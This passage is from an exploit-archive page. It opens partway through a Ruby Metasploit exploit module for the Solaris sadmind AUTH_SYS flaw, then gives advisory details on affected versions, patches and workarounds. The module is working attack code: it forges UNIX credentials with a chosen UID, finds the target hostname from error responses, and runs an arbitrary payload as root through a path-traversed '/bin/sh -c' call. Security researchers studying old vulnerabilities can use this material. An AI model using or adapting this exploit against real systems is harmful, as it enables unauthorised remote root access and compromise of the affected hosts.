				OptInt.new('UID', [false, 'UID to emulate', 0])
			], self.class
		)
	end

	def exploit
		sunrpc_create('udp', 100232, 10)
		sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])
	
		if !datastore['HOSTNAME']
			print_status('attempting to determine hostname')
			response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")
	
			if !response
				print_error('no response')
				return
			end
	
			match = /Security exception on host (.*)\.  USER/.match(response)
			if match
				hostname = match.captures[0]
				print_status("found hostname: #{hostname}")
			else
				print_error('unable to determine hostname')
				return
			end
		else
			hostname = datastore['HOSTNAME']
		end

		response = sadmind_request(hostname, payload.encoded)
		sunrpc_destroy

		if /Security exception on host/.match(response)
			print_error('exploit failed')
			return
		else
			print_good('exploit did not give us an error, this is good...')
			sleep(1)
			handler
		end
	end

	def sadmind_request(host, command)
		header =
			XDR.encode(0) * 7 +
			XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \
				4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \
				host, 'system', '../../../bin/sh')

		body =
			do_int('ADM_FW_VERSION', 1) +
			do_string('ADM_LANG', 'C') +
			do_string('ADM_REQUESTID', '00009:000000000:0') +
			do_string('ADM_CLASS', 'system') +
			do_string('ADM_CLASS_VERS', '2.1') +
			do_string('ADM_METHOD', '../../../bin/sh') +
			do_string('ADM_HOST', host) +
			do_string('ADM_CLIENT_HOST', host) +
			do_string('ADM_CLIENT_DOMAIN', '') +
			do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
			do_int('ADM_FENCE', 0) +
			do_string('X', '-c') +
			do_string('Y', command) +
			XDR.encode('netmgt_endofargs')

		request = header + XDR.encode(header.length + body.length - 326) + body

		ret = sunrpc_call(1, request)
		return XDR.decode!(ret, Integer, Integer, String)[2]
	end 

	def do_string(str1, str2)
		XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
	end

	def do_int(str, int)
		XDR.encode(str, 3, 4, int, 0, 0)
	end
end

    

- Vulnerability information (OSVDB)

4585
Solaris sadmind AUTH_SYS Credential Remote Command Execution
Remote / Network Access, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

Sun Microsystems Solaris contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to a flaw in the sadmind daemon's handling of AUTH_SYS requests. If an attacker sends a specially crafted Remote Procedure Call (RPC) packet, they may be able to forge the AUTH_SYS credentials. This would allow the execution of arbitrary commands with root privileges.

- Timeline

2003-09-13 Unknown
2003-09-13 Unknown

- Solution

Sun Microsystems has released a patch to address this issue. It is also possible to correct the flaw by implementing the following workarounds: Disable the sadmind daemon. SPARC Platform - Patch 116456-01 x86 Platform - Patch 116457-02

- Vulnerability information (SecurityFocus BID)

Sun Solaris SAdmin Client Credentials Remote Administrative Access Vulnerability
Class: Design Error   BID: 8615
Remote: Yes   Local: No
Published: 2003-09-16 12:00:00   Updated: 2007-11-15 12:39:00
Discovery credited to Mark Zielinski.

- Affected program versions

Sun Trusted Solaris 8.0 x86
Sun Trusted Solaris 8.0
Sun Trusted Solaris 7.0 x86
Sun Trusted Solaris 7.0
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6

- Discussion

An issue in the Sun Solaris 'sadmind' service may allow a remote user to gain unauthorized administrative access.

- Exploit

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Exploit code has been published.

An exploit (solaris_sadmind_exec.pm) has been released as part of the MetaSploit Framework 2.0.

- Solution

Sun has released an advisory regarding this issue and has supplied specific instructions on securing a vulnerable system until a fix is released. See the referenced advisory for details.

Sun Solaris 7.0
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 9
Sun Solaris 7.0_x86
Sun Solaris 9_x86